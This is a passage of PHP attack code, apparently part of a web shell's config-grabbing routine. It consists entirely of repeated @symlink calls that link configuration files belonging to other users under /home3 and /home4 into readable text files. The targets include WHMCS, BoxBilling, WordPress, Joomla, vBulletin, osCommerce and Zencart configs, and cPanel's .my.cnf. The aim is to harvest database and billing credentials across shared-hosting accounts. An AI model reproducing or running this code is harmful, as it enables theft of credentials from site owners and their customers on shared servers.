  1368. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1425. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1457. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1458. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1459. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1460. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1461. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1462. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1463. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1464. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1465. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1466. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1467. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1468. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1469. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1470. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1471. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1472. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1473. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1474. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1475. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1476. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1477. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1478. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1479. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1480. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1481. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1482. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1483. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1484. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1485. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1486. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1487. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1488. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1489. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1490. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1491. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1492. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1493. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1494. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1495. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1496. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1497. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1498. @symlink('/home3/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1499. @symlink('/home3/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1500. //Home4
  1501.  
  1502. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1503. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1504. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1505. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1506. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1507. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1508. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1509. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1510. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1511. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1512. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1513. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1514. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1515. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1516. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1517. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1518. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1519. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1520. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1521. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1522. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1523. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1524. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1525. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1526. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1527. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1528. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1529. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1530. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1531. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1532. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1533. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1534. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1535. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1536. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1537. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1538. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1539. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1540. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1541. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1542. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1543. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1544. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1545. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1546. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1547. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1548. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1625. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1626. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1627. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1628. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1629. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1630. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1631. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1632. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1633. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1634. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1635. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1636. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1637. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1638. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1639. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1640. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1641. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1642. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1643. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1644. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1645. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1646. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1647. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1648. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1649. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1650. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1651. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1652. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1653. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1654. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1655. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1656. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1657. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1658. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1659. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1660. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1661. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1662. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1663. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1664. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1665. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1666. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1667. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1668. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1669. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1670. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1671. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
